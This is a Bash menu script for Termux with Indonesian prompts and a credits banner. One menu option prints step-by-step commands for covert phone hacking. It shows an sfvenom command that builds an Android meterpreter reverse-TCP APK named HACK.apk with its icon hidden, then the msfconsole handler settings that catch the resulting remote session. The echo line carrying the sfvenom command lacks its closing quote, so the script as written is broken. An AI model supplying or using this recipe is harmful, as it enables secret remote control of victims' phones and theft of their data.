#!/bin/bash

#Gunakan Tools ini dengan Bijak!

clear

figlet "MR DAF" | lolcat ;sleep 0.1

echo "\033[0;31m++++++++++++++++++++++++++++++++++++++" ;sleep 0.1

echo "   \033[0;31m| \033[1;37mAuther_ : MU'AMMAR HANAFI \033[0;31m|" ;sleep 0.1

echo "   \033[0;31m| \033[1;37mYouTube : MAH Gaming      \033[0;31m|" ;sleep 0.1

echo "   \033[0;31m| \033[1;37mFB_____ : Mu Ammar Hanafi \033[0;31m|" ;sleep 0.1

echo "   \033[0;31m| \033[1;37mIG_____ : mu_ammar_hanafi \033[0;31m|" ;sleep 0.1

echo "\033[0;31m++++++++++++++++++++++++++++++++++++++" ;sleep 0.1

echo

echo "             \033[1;37mPILIH MENU " ;sleep 1

echo

echo " \033[0;32m[\033[0;31m1\033[0;32m] \033[0;31mTampilan Awal" ;sleep 0.1

echo " \033[0;32m[\033[0;31m2\033[0;32m] \033[0;31mMatesploit" ;sleep 0.1

echo " \033[0;32m[\033[0;31m3\033[0;32m] \033[0;31mTroll Project" ;sleep 0.1

echo " \033[0;32m[\033[0;31m4\033[0;32m] \033[0;31mInstall Bahan-Bahan" ;sleep 0.1

echo " \033[0;32m[\033[0;31m5\033[0;32m] \033[0;31mEdit" ;sleep 0.1

echo

read -p "[Pilih Nomer]>> " pill

#batas gan

if [ $pill = "1" ]

then

python m.py

fi

#batas gan

if [ $pill = "2" ]

then

clear

echo "\033[0;31mKALIAN TULIS ATAU KALIAN SALIN" ;sleep 2

echo

echo "\033[1;37msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=7766 AndroidHideApplcon=true R -o /sdcard/HACK.apk

echo

echo "\033[0;31mKALAU SUDAH KALIAN KETIK YANG DI BAWA" ;sleep 2

echo

echo "\033[1;37mmsfconsole" ;sleep 1

echo

echo "\033[1;37muse multi/handler" ;sleep 1

echo

echo "\033[1;37mset payload android/meterpreter/reverse_tcp" ;sleep 1

echo

echo "\033[1;37mset lhost 127.0.0.1" ;sleep 1

echo

echo "\033[1;37mset lport 7766" ;sleep 1

echo

echo "\033[1;37mrun" ;sleep 1

echo

fi

#batas gan

if [ $pill = "3" ]

then

figlet "SABAR BANG"

cd troll_project

chmod +x *

termux-fix-shebang troll.sh

./troll.sh

fi

#batas gan

if [ $pill = "4" ]

then

pkg update && pkg upgrade

pkg install ruby

gem install lolcat

pkg install cowsay

pkg install vim

pkg install nano

pkg install screenfetch

pkg install toilet

pkg install figlet

pkg install php

pkg install python

pkg install python2

pkg install pip

pkg install pip2

pip2 install requests

pip2 install mechanize

fi

#batas gan

if [ $pill = "5" ]

then

figlet "TERIMA KASIH"

figlet "UDAH MAMPIR"

exit

exit

exit

fi
